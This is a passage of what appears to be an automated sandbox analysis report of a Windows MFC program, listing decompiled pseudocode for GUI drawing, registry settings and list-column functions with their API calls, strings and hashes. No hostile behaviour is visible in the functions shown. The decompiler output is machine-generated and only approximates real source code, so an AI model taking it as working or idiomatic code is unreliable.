					 *((intOrPtr*)(_t130 - 0x18)) = 0;
				} else {
					_push(0);
					_push(0xc3);
					_push(0);
					_push(0x42c530);
					_push( *((intOrPtr*)(_t130 + 0xc)));
					_push(0);
					_push(0);
					_push(3);
					_t70 = E004014E7(_t70);
					 *((intOrPtr*)(_t130 - 0x18)) = _t70;
				}
				 *(_t130 - 4) =  *(_t130 - 4) & 0x00000000;
				_push(0x60);
				L00425E38();
				 *((intOrPtr*)(_t130 - 0x1c)) = _t70;
				 *(_t130 - 4) = 4;
				if(_t70 == 0) {
					 *((intOrPtr*)(_t130 - 0x1c)) = 0;
				} else {
					_t116 = 0x23;
					_push(0);
					_push(_t116);
					_push(0);
					_push("<	D");
					_push( *((intOrPtr*)(_t130 + 0xc)));
					_push(0);
					_push(1);
					_push(4);
					_t70 = E004014E7( *((intOrPtr*)(_t130 - 0x1c)));
					 *((intOrPtr*)(_t130 - 0x1c)) = _t70;
				}
				 *(_t130 - 4) =  *(_t130 - 4) & 0x00000000;
				_push(0x8073);
				L00425E02();
				_push(0x60);
				L00425E38();
				 *((intOrPtr*)(_t130 - 0x20)) = _t70;
				_t139 = _t70;
				 *(_t130 - 4) = 5;
				if(_t70 == 0) {
					 *((intOrPtr*)(_t130 + 0xc)) = 0;
				} else {
					_push(0);
					_push(0x42c158);
					_push( *((intOrPtr*)(_t130 + 0xc)));
					_push( *((intOrPtr*)(_t130 - 0x14)));
					_push(5);
					 *((intOrPtr*)(_t130 + 0xc)) = E004018BB(_t70, _t139);
				}
				 *(_t130 - 4) =  *(_t130 - 4) & 0x00000000;
				E00401870( *((intOrPtr*)(_t130 - 0x10)), 0x82);
				E00401870( *((intOrPtr*)(_t130 + 0xc)), 0x89);
				_t125 = _t128 + 0x178;
				L00401D70(_t125, _t139, _t93);
				L00401B22(_t125, _t128, _t139, _t93,  *((intOrPtr*)(_t130 - 0x10)));
				L00401B22(_t125, _t128, _t139,  *((intOrPtr*)(_t130 - 0x10)),  *((intOrPtr*)(_t130 - 0x18)));
				L00401B22(_t125, _t128, _t139,  *((intOrPtr*)(_t130 - 0x10)),  *((intOrPtr*)(_t130 - 0x1c)));
				L00401B22(_t125, _t128, _t139, _t93,  *((intOrPtr*)(_t130 + 0xc)));
				 *((intOrPtr*)( *_t125 + 0x58))(_t128);
				 *((intOrPtr*)(_t128 + 0x374)) =  *((intOrPtr*)(_t93 + 0xc));
				 *((intOrPtr*)(_t128 + 0x37c)) =  *((intOrPtr*)( *((intOrPtr*)(_t130 - 0x10)) + 0xc));
				 *((intOrPtr*)(_t128 + 0x36c)) =  *((intOrPtr*)( *((intOrPtr*)(_t130 - 0x18)) + 0xc));
				 *((intOrPtr*)(_t128 + 0x370)) =  *((intOrPtr*)( *((intOrPtr*)(_t130 - 0x1c)) + 0xc));
				E0040171C( *((intOrPtr*)( *((intOrPtr*)(_t130 - 0x1c)) + 0xc)), _t128);
				 *(_t130 - 4) =  *(_t130 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t128 + 0x378)) =  *((intOrPtr*)(_t93 + 0xc));
				 *((intOrPtr*)(_t128 + 0x380)) =  *((intOrPtr*)( *((intOrPtr*)(_t130 + 0xc)) + 0xc));
				L00425DFC();
				_t89 = 1;
				 *[fs:0x0] =  *((intOrPtr*)(_t130 - 0xc));
				return _t89;
			}

0x0040c75a
0x0040c75f
0x0040c769
0x0040c76c
0x0040c774
0x0040c77b
0x0040c77d
0x0040c780
0x0040c786
0x0040c78b
0x0040c78f
0x0040c7ad
0x0040c7ad
0x0040c791
0x0040c791
0x0040c793
0x0040c798
0x0040c79d
0x0040c7a2
0x0040c7a4
0x0040c7a9
0x0040c7a9
0x0040c7af
0x0040c7b3
0x0040c7b5
0x0040c7bb
0x0040c7c0
0x0040c7c4
0x0040c7df
0x0040c7c6
0x0040c7c6
0x0040c7c9
0x0040c7cc
0x0040c7ce
0x0040c7d0
0x0040c7d3
0x0040c7d5
0x0040c7da
0x0040c7da
0x0040c7e2
0x0040c7e6
0x0040c7e8
0x0040c7ee
0x0040c7f3
0x0040c7f7
0x0040c81b
0x0040c7f9
0x0040c800
0x0040c801
0x0040c802
0x0040c803
0x0040c808
0x0040c80d
0x0040c80e
0x0040c80f
0x0040c811
0x0040c816
0x0040c816
0x0040c81e
0x0040c822
0x0040c824
0x0040c82a
0x0040c82f
0x0040c833
0x0040c857
0x0040c835
0x0040c839
0x0040c83a
0x0040c83b
0x0040c83c
0x0040c840
0x0040c845
0x0040c848
0x0040c849
0x0040c84b
0x0040c84d
0x0040c852
0x0040c852
0x0040c85a
0x0040c85e
0x0040c866
0x0040c86b
0x0040c86d
0x0040c873
0x0040c876
0x0040c878
0x0040c87c
0x0040c898
0x0040c87e
0x0040c87e
0x0040c87f
0x0040c884
0x0040c889
0x0040c88c
0x0040c893
0x0040c893
0x0040c89e
0x0040c8a7
0x0040c8b4
0x0040c8b9
0x0040c8c2
0x0040c8cd
0x0040c8da
0x0040c8e7
0x0040c8f2
0x0040c8fc
0x0040c903
0x0040c90f
0x0040c91b
0x0040c927
0x0040c92d
0x0040c938
0x0040c942
0x0040c948
0x0040c94e
0x0040c958
0x0040c95c
0x0040c964

APIs

_EH_prolog.MSVCRT ref: 0040C75F
#537.MFC42(00008052), ref: 0040C774
#823.MFC42(00000060,00008052), ref: 0040C780
#823.MFC42(00000060,00008052), ref: 0040C7B5
#823.MFC42(00000060,00008052), ref: 0040C7E8
#823.MFC42(00000060,00008052), ref: 0040C824
#4160.MFC42(00008073,00008052), ref: 0040C866
#823.MFC42(00000060,00008073,00008052), ref: 0040C86D

Part of subcall function 004018BB: _EH_prolog.MSVCRT ref: 00422F2E
Part of subcall function 004018BB: #540.MFC42 ref: 00422F41
Part of subcall function 004018BB: #540.MFC42 ref: 00422F4D
Part of subcall function 004018BB: #4045.MFC42(0042F1E0), ref: 00422F91
Part of subcall function 004018BB: #860.MFC42(?,0042F1E0), ref: 00422FC0

#800.MFC42(?,00000000,?,?,?,?,?,00000000,?,00000000,00008073,00008052), ref: 0040C94E

Strings

<D, xrefs: 0040C840

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #823$#540H_prolog$#4045#4160#537#800#860
String ID: <D
API String ID: 3543215593-1917057830
Opcode ID: 67f3127100a2425890fe945387e7f2c7ee1968ea2ed0d4d044ccb4eacf50032f
Instruction ID: 5cccca84a66b831c22f9ff2cd2d8c604c901682d1a3d8f925e005f0efed4350d
Opcode Fuzzy Hash: 67f3127100a2425890fe945387e7f2c7ee1968ea2ed0d4d044ccb4eacf50032f
Instruction Fuzzy Hash: 6D61A171A40255EEDB15EBA5C886FAEBBB5EF84310F10842FF515B72D1C7B85A00DB28

Uniqueness

Uniqueness Score: -1.00%

Function 00401802, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00401802(intOrPtr __ecx) {
				intOrPtr _t41;
				void* _t46;
				void* _t59;
				intOrPtr _t61;
				void* _t73;
				RECT* _t76;
				intOrPtr _t77;
				void* _t79;
				void* _t81;
				long long* _t82;
				long long _t91;

				_t61 = __ecx;
				L004269E6();
				_t82 = _t81 - 0xc;
				 *((intOrPtr*)(_t79 - 0x10)) = __ecx;
				 *(_t79 - 0x14) = 0;
				 *(_t79 - 0x18) = 0x42e55c;
				_t76 =  *(_t79 + 0xc);
				 *((intOrPtr*)(_t79 - 4)) = 0;
				_t73 = (_t76->bottom - _t76->top >> 1) - 3;
				if(_t73 < 0) {
					_t73 = 0;
				}
				_t59 = (_t76->right - _t76->left >> 1) - 3;
				if(_t59 < 0) {
					_t59 = 0;
				}
				_t89 =  *((intOrPtr*)(_t79 + 0x18));
				if( *((intOrPtr*)(_t79 + 0x18)) == 0) {
					_t91 =  *0x42e5e8;
				} else {
					_t91 =  *0x42e5a8;
				}
				_push(_t61);
				 *_t82 = _t91;
				_push(CreateSolidBrush(L0040226B(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t79 + 0x14)))), _t61)));
				L004264BC();
				_t12 = _t79 - 0x18; // 0x42e55c
				asm("sbb eax, eax");
				FillRect( *( *((intOrPtr*)(_t79 + 8)) + 4), _t76,  ~_t12 &  *(_t79 - 0x14));
				L00425FA6();
				_t41 =  *((intOrPtr*)( *((intOrPtr*)(_t79 + 0x14))));
				_push(_t41);
				_push(_t41);
				_push(_t76);
				L004264D4();
				if( *((intOrPtr*)(_t79 + 0x10)) != 0) {
					_push(GetSysColor(7));
					_push(_t76->top + _t73);
					_t46 = _t76->left + _t59;
					__eflags = _t46;
					_push(_t46);
					_push( *((intOrPtr*)(_t79 + 8)));
					E004010AF();
				} else {
					_push(1);
					_push(GetSysColor(7));
					_push(_t76->top + _t73);
					_push(_t76->left + _t59);
					_push( *((intOrPtr*)(_t79 + 8)));
					L00402031();
				}
				 *(_t79 - 0x18) = 0x42c514;
				_t77 = 1;
				 *((intOrPtr*)(_t79 - 4)) = _t77;
				L00425FA6();
				 *[fs:0x0] =  *((intOrPtr*)(_t79 - 0xc));
				return _t77;
			}

0x00401802
0x0041786f
0x00417874
0x0041787c
0x0041787f
0x00417882
0x00417889
0x0041788c
0x00417897
0x0041789a
0x0041789c
0x0041789c
0x004178a5
0x004178a8
0x004178aa
0x004178aa
0x004178ac
0x004178af
0x004178b9
0x004178b1
0x004178b1
0x004178b1
0x004178c2
0x004178c4
0x004178d8
0x004178dc
0x004178e1
0x004178e6
0x004178f3
0x004178fc
0x00417907
0x00417909
0x0041790a
0x0041790b
0x0041790c
0x00417915
0x00417942
0x0041794b
0x0041794e
0x0041794e
0x00417950
0x00417951
0x00417954
0x00417917
0x00417917
0x00417921
0x0041792a
0x0041792f
0x00417930
0x00417933
0x00417933
0x00417959
0x00417965
0x00417966
0x00417969
0x00417976
0x0041797e

APIs

_EH_prolog.MSVCRT ref: 0041786F
CreateSolidBrush.GDI32(00000000), ref: 004178D2
#1641.MFC42(00000000), ref: 004178DC
FillRect.USER32 ref: 004178F3
#2414.MFC42 ref: 004178FC
#2567.MFC42(?,?,?), ref: 0041790C
GetSysColor.USER32(00000007), ref: 0041791B
GetSysColor.USER32(00000007), ref: 0041793C

Part of subcall function 004010AF: _EH_prolog.MSVCRT ref: 004162DC
Part of subcall function 004010AF: CreateSolidBrush.GDI32(DB), ref: 0041630D
Part of subcall function 004010AF: #1641.MFC42(00000000), ref: 00416317
Part of subcall function 004010AF: CreatePen.GDI32(00000000,00000000,0042E544), ref: 00416321
Part of subcall function 004010AF: #1641.MFC42(00000000), ref: 0041632B
Part of subcall function 004010AF: #5787.MFC42(0042E55C,00000000), ref: 00416339
Part of subcall function 004010AF: #5787.MFC42(0042E544,0042E55C,00000000), ref: 00416347
Part of subcall function 004010AF: Ellipse.GDI32(00000001,?,?,?,?), ref: 0041635E
Part of subcall function 004010AF: #5787.MFC42(0042E544), ref: 00416369
Part of subcall function 004010AF: #5787.MFC42(?,0042E544), ref: 00416373
Part of subcall function 004010AF: #2414.MFC42(?,0042E544), ref: 0041637B
Part of subcall function 004010AF: #2414.MFC42(?,0042E544), ref: 00416383
Part of subcall function 004010AF: #2414.MFC42(?,0042E544), ref: 00416397
Part of subcall function 004010AF: #2414.MFC42(?,0042E544), ref: 004163B0

#2414.MFC42(?,?,?,00000000), ref: 00417969

Strings

\B, xrefs: 004178D9

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2414$#5787$#1641Create$BrushColorH_prologSolid$#2567EllipseFillRect
String ID: \B
API String ID: 1707003037-2993081821
Opcode ID: 05ebb4848239e4559950c0696a482af3d406da2c81dd32ff6d0205e52aef6394
Instruction ID: dca4242b122893bf4fba4d9961e15f41bc618129855f9c2d9528a6391e0b8dac
Opcode Fuzzy Hash: 05ebb4848239e4559950c0696a482af3d406da2c81dd32ff6d0205e52aef6394
Instruction Fuzzy Hash: 37316571A00515EFDB10EFA9DD85AAEBBB8FF44304F04402AF509D3251D778A984CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004020C2, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004020C2(intOrPtr __ecx) {
				intOrPtr _t37;
				struct HDC__* _t41;
				struct HBITMAP__* _t45;
				intOrPtr _t48;
				intOrPtr _t50;
				signed int _t53;
				struct tagRECT* _t61;
				intOrPtr _t64;
				void* _t66;

				L004269E6();
				_t64 = __ecx;
				 *((intOrPtr*)(_t66 - 0x10)) = __ecx;
				L004264B0();
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *(__ecx + 0x14) =  *(__ecx + 0x14) & 0x00000000;
				 *((intOrPtr*)(__ecx + 0x10)) = 0x42e34c;
				_t61 = __ecx + 0x20;
				 *(_t66 - 4) = 1;
				 *((intOrPtr*)(__ecx)) = 0x42e614;
				CopyRect(_t61,  *(_t66 + 0xc));
				_t48 =  *((intOrPtr*)(_t66 + 8));
				 *(_t64 + 0x18) =  *(_t64 + 0x18) & 0x00000000;
				 *((intOrPtr*)(_t64 + 0x1c)) = _t48;
				_t37 =  *((intOrPtr*)(_t48 + 0xc));
				_t53 = 0 | _t37 == 0x00000000;
				 *(_t64 + 0x30) = _t53;
				if(_t53 == 0) {
					 *((intOrPtr*)(_t64 + 0xc)) = _t37;
					 *(_t64 + 4) =  *(_t48 + 4);
					 *((intOrPtr*)(_t64 + 8)) =  *((intOrPtr*)(_t48 + 8));
				} else {
					if(_t48 != 0) {
						_t41 =  *(_t48 + 4);
					} else {
						_t41 = 0;
					}
					_push(CreateCompatibleDC(_t41));
					L004264AA();
					_t45 = CreateCompatibleBitmap( *(_t48 + 4), _t61->right - _t61->left, _t61->bottom - _t61->top);
					_t50 = _t64 + 0x10;
					_push(_t45);
					L004264BC();
					if(_t50 != 0) {
						_t24 = _t50 + 4; // 0x401992
						_t50 =  *_t24;
					}
					_push(_t50);
					_push( *(_t64 + 4));
					L00426540();
					_push( *((intOrPtr*)(_t64 + 0x24)));
					 *(_t64 + 0x18) = _t45;
					_push(_t61->left);
					_push(_t66 - 0x18);
					L004266B4();
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t66 - 0xc));
				return _t64;
			}

0x0041af33
0x0041af3d
0x0041af40
0x0041af43
0x0041af48
0x0041af4c
0x0041af50
0x0041af5a
0x0041af5d
0x0041af61
0x0041af68
0x0041af6e
0x0041af71
0x0041af77
0x0041af7a
0x0041af7f
0x0041af84
0x0041af87
0x0041afe9
0x0041afef
0x0041aff5
0x0041af89
0x0041af8b
0x0041af91
0x0041af8d
0x0041af8d
0x0041af8d
0x0041af9b
0x0041af9e
0x0041afb3
0x0041afb9
0x0041afbc
0x0041afbf
0x0041afc6
0x0041afc8
0x0041afc8
0x0041afc8
0x0041afcb
0x0041afcc
0x0041afcf
0x0041afd4
0x0041afd7
0x0041afdf
0x0041afe1
0x0041afe2
0x0041afe2
0x0041b000
0x0041b008

APIs

_EH_prolog.MSVCRT ref: 0041AF33
#323.MFC42 ref: 0041AF43
CopyRect.USER32 ref: 0041AF68
CreateCompatibleDC.GDI32(00000001), ref: 0041AF95
#1640.MFC42(00000000), ref: 0041AF9E
CreateCompatibleBitmap.GDI32(00000001,?,?), ref: 0041AFB3
#1641.MFC42(00000000), ref: 0041AFBF
#5785.MFC42(00000001,0042E34C,00000000), ref: 0041AFCF
#6194.MFC42(00000000,?,00000001,00000001,0042E34C,00000000), ref: 0041AFE2

Strings

LB, xrefs: 0041AF50

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CompatibleCreate$#1640#1641#323#5785#6194BitmapCopyH_prologRect
String ID: LB
API String ID: 30330010-3532020319
Opcode ID: f4e087348d6d8be0f7fdc486648cd526d29c09423431e4c2ecf8e353a3383d51
Instruction ID: 3cf61096bef0b62cb1235e7a0b80d8c748f2b5a7472e632180eb0b1551341b30
Opcode Fuzzy Hash: f4e087348d6d8be0f7fdc486648cd526d29c09423431e4c2ecf8e353a3383d51
Instruction Fuzzy Hash: 773180B5600711DFCB10DF65D984A6ABBF8FF14304B00852EE84687601D738E955CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040C23A, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040C23A(intOrPtr __ecx, void* __eflags) {
				void* _t38;
				intOrPtr _t39;
				void* _t58;

				L004269E6();
				_push(__ecx);
				 *((intOrPtr*)(_t58 - 0x10)) = __ecx;
				L00401F41(__ecx);
				 *((intOrPtr*)(_t58 - 4)) = 0;
				L00401A37(__ecx + 0x178);
				 *((char*)(_t58 - 4)) = 1;
				L004020E5(__ecx + 0x1c0);
				 *((char*)(_t58 - 4)) = 2;
				E00402216(__ecx + 0x218);
				 *((char*)(_t58 - 4)) = 3;
				L004262F4();
				 *((char*)(_t58 - 4)) = 4;
				L004262EE();
				 *((char*)(_t58 - 4)) = 5;
				E00401A0A(__ecx + 0x4b4);
				 *((char*)(_t58 - 4)) = 6;
				_t38 = E00401F4B(__ecx + 0x6c4);
				 *((char*)(_t58 - 4)) = 7;
				 *((intOrPtr*)(__ecx)) = 0x42d40c;
				L00425E44();
				_t39 =  *((intOrPtr*)(_t38 + 4));
				_push(1);
				_push("Language");
				_push("Settings");
				 *((intOrPtr*)(__ecx + 0x1bc)) = _t39;
				 *((intOrPtr*)(__ecx + 0x36c)) = 0;
				 *((intOrPtr*)(__ecx + 0x370)) = 0;
				 *((intOrPtr*)(__ecx + 0x374)) = 0;
				 *((intOrPtr*)(__ecx + 0x380)) = 0;
				 *((intOrPtr*)(__ecx + 0x378)) = 0;
				 *((intOrPtr*)(__ecx + 0x214)) = 0;
				 *((intOrPtr*)(__ecx + 0x37c)) = 0;
				L00425E3E();
				_push(0);
				_push("OnTop");
				_push("Settings");
				 *((intOrPtr*)(__ecx + 0x384)) = _t39;
				 *((intOrPtr*)(__ecx + 0x388)) = 0;
				L00425E3E();
				 *((intOrPtr*)(__ecx + 0x38c)) = _t39;
				 *((intOrPtr*)(__ecx + 0x390)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return __ecx;
			}

0x0040c23f
0x0040c244
0x0040c249
0x0040c24c
0x0040c259
0x0040c25c
0x0040c267
0x0040c26b
0x0040c276
0x0040c27a
0x0040c285
0x0040c289
0x0040c294
0x0040c298
0x0040c2a3
0x0040c2a7
0x0040c2b2
0x0040c2b6
0x0040c2bb
0x0040c2bf
0x0040c2c5
0x0040c2ca
0x0040c2cd
0x0040c2cf
0x0040c2d4
0x0040c2db
0x0040c2e1
0x0040c2e7
0x0040c2ed
0x0040c2f3
0x0040c2f9
0x0040c2ff
0x0040c305
0x0040c30b
0x0040c316
0x0040c317
0x0040c31c
0x0040c321
0x0040c327
0x0040c32d
0x0040c335
0x0040c33b
0x0040c345
0x0040c34d

APIs

_EH_prolog.MSVCRT ref: 0040C23F

Part of subcall function 00402216: _EH_prolog.MSVCRT ref: 0040A801
Part of subcall function 00402216: #384.MFC42 ref: 0040A81D
Part of subcall function 00402216: #567.MFC42 ref: 0040A82E

#529.MFC42 ref: 0040C289
#554.MFC42 ref: 0040C298

Part of subcall function 00401A0A: _EH_prolog.MSVCRT ref: 0040B92B
Part of subcall function 00401A0A: #567.MFC42 ref: 0040B94A
Part of subcall function 00401A0A: #567.MFC42 ref: 0040B961
Part of subcall function 00401A0A: #567.MFC42 ref: 0040B979
Part of subcall function 00401A0A: #567.MFC42 ref: 0040B990
Part of subcall function 00401A0A: #567.MFC42 ref: 0040B9A3
Part of subcall function 00401A0A: #567.MFC42 ref: 0040B9BA
Part of subcall function 00401A0A: #1168.MFC42 ref: 0040B9CF

Part of subcall function 00401F4B: _EH_prolog.MSVCRT ref: 0041DC70
Part of subcall function 00401F4B: #298.MFC42 ref: 0041DC7E
Part of subcall function 00401F4B: #540.MFC42 ref: 0041DCA3
Part of subcall function 00401F4B: #860.MFC42(default), ref: 0041DCD1
Part of subcall function 00401F4B: GetSysColor.USER32(0000000C), ref: 0041DCE1
Part of subcall function 00401F4B: GetSysColor.USER32(00000016), ref: 0041DCEB

#1168.MFC42 ref: 0040C2C5
#3521.MFC42(Settings,Language,00000001), ref: 0040C30B
#3521.MFC42(Settings,OnTop,00000000,Settings,Language,00000001), ref: 0040C32D

Strings

Settings, xrefs: 0040C31C
Language, xrefs: 0040C2CF
Settings, xrefs: 0040C2D4
OnTop, xrefs: 0040C317

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #567$H_prolog$#1168#3521Color$#298#384#529#540#554#860
String ID: Language$OnTop$Settings$Settings
API String ID: 201245156-25859776
Opcode ID: 6ec77e193e10b3f58620c3e584a0a5716ddc929d0b63b92a5371ce5a600e1d27
Instruction ID: 062116a91f6c99932e3f078820ed8cd509018e3ea3a4d66074e2109542992b49
Opcode Fuzzy Hash: 6ec77e193e10b3f58620c3e584a0a5716ddc929d0b63b92a5371ce5a600e1d27
Instruction Fuzzy Hash: E1314DB0A01B40DFD325EF76C1457DAFBE8AF64304F40449FE1AA93292CBB82604DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00401672, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 57
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00401672(void* __ecx) {
				signed short _t16;
				int _t21;
				signed short* _t33;
				void* _t35;
				void* _t37;

				L004269E6();
				L00425E44();
				L00425E08();
				_t33 =  *(_t35 + 0xc);
				_t21 = 0;
				_push(0);
				_push("Column Count");
				_t16 =  *_t33;
				_push(_t16);
				 *(_t35 - 4) = 0;
				L00425E3E();
				 *(_t35 + 0xc) = _t16;
				if(_t16 > 0) {
					do {
						_push(_t21);
						_push("Column %i");
						_push(_t35 - 0x10);
						L00425FDC();
						_t16 =  *_t33;
						_t37 = _t37 + 0xc;
						_push(0xffffffff);
						_push( *((intOrPtr*)(_t35 - 0x10)));
						_push(_t16);
						L00425E3E();
						if(_t16 != 0xffffffff) {
							_t16 = SendMessageA( *( *((intOrPtr*)(_t35 + 8)) + 0x20), 0x101e, _t21, _t16 & 0x0000ffff);
						}
						_t21 = _t21 + 1;
					} while (_t21 <  *(_t35 + 0xc));
				}
				 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t35 - 0xc));
				return _t16;
			}

0x0041e458
0x0041e461
0x0041e46c
0x0041e471
0x0041e474
0x0041e476
0x0041e477
0x0041e47c
0x0041e480
0x0041e481
0x0041e484
0x0041e48b
0x0041e48e
0x0041e490
0x0041e490
0x0041e494
0x0041e499
0x0041e49a
0x0041e49f
0x0041e4a1
0x0041e4a6
0x0041e4a8
0x0041e4ab
0x0041e4ac
0x0041e4b4
0x0041e4c6
0x0041e4c6
0x0041e4cc
0x0041e4cd
0x0041e490
0x0041e4d2
0x0041e4d9
0x0041e4e4
0x0041e4ec

APIs

_EH_prolog.MSVCRT ref: 0041E458
#1168.MFC42 ref: 0041E461
#540.MFC42 ref: 0041E46C
#3521.MFC42(00000000,Column Count,00000000), ref: 0041E484
#2818.MFC42(?,Column %i,00000000,00000000,Column Count,00000000), ref: 0041E49A
#3521.MFC42(00000000,000000FF,000000FF), ref: 0041E4AC
SendMessageA.USER32 ref: 0041E4C6
#800.MFC42(00000000,Column Count,00000000), ref: 0041E4D9

Strings

Column %i, xrefs: 0041E494
Column Count, xrefs: 0041E477

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #3521$#1168#2818#540#800H_prologMessageSend
String ID: Column %i$Column Count
API String ID: 3350746845-4111091038
Opcode ID: a4f46036147f52fa1c40dc9b974afcccd17727aee6639932766a6c168609553f
Instruction ID: 63bc89fb95b8e2f288398504a2ec989c5a53f56f72815502ff2e0863bac6b411
Opcode Fuzzy Hash: a4f46036147f52fa1c40dc9b974afcccd17727aee6639932766a6c168609553f
Instruction Fuzzy Hash: 09117375700125BFCB14EF56DC86DBE7768FF44368B604A2AF569A7191C6389D00C718

Uniqueness

Uniqueness Score: -1.00%

Function 00401A05, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

